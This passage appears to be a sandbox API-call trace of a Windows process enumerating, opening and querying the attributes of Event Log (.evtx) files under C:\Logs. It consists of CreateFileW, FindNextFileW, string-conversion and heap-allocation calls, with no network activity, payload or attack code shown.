lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=59 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 59 [0086.393] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.393] GetFileType (hFile=0x348) returned 0x1 [0086.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0086.393] CloseHandle (hObject=0x348) returned 1 [0086.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0086.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0086.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.394] AreFileApisANSI () returned 1 [0086.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0086.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0086.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=59 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 59 [0086.394] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0086.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.394] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x211000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cAlternateFileName="MIA24C~1.EVT")) returned 1 [0086.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0086.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0086.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0086.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0086.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0086.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0086.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0086.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0086.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0086.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0086.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0086.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0086.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0086.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0086.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0086.395] AreFileApisANSI () returned 1 [0086.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx", lpUsedDefaultChar=0x0) returned 65 [0086.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0086.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.395] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0086.395] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0086.396] AreFileApisANSI () returned 1 [0086.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0086.396] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x81fc8 [0086.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x81fc8, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 65 [0086.396] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.396] GetFileType (hFile=0x348) returned 0x1 [0086.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81fc8 | out: hHeap=0x20000) returned 1 [0086.396] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.396] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.396] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.396] CloseHandle (hObject=0x348) returned 1 [0086.397] AreFileApisANSI () returned 1 [0086.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0086.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82688 [0086.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 65 [0086.397] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.397] GetFileType (hFile=0x348) returned 0x1 [0086.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0086.397] CloseHandle (hObject=0x348) returned 1 [0086.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0086.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0086.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0086.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0086.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0086.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0086.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0086.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0086.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0086.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0086.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0086.398] AreFileApisANSI () returned 1 [0086.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0086.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82dd8 [0086.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=65 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 65 [0086.398] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x211000)) returned 1 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0086.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.398] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.398] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cAlternateFileName="MIDBEC~1.EVT")) returned 1 [0086.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68bd0 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0086.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68bd0 | out: hHeap=0x20000) returned 1 [0086.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0086.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0086.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0086.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0086.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0086.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0086.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.399] AreFileApisANSI () returned 1 [0086.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpUsedDefaultChar=0x0) returned 64 [0086.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0086.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0086.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0086.399] AreFileApisANSI () returned 1 [0086.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0086.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0086.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6e7a0, cchWideChar=64 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 64 [0086.400] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.400] GetFileType (hFile=0x348) returned 0x1 [0086.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0086.401] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.401] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.401] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.401] CloseHandle (hObject=0x348) returned 1 [0086.401] AreFileApisANSI () returned 1 [0086.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0086.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0086.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6e580, cchWideChar=64 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 64 [0086.401] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.401] GetFileType (hFile=0x348) returned 0x1 [0086.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0086.402] CloseHandle (hObject=0x348) returned 1 [0086.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.402] RtlAllocateHeap 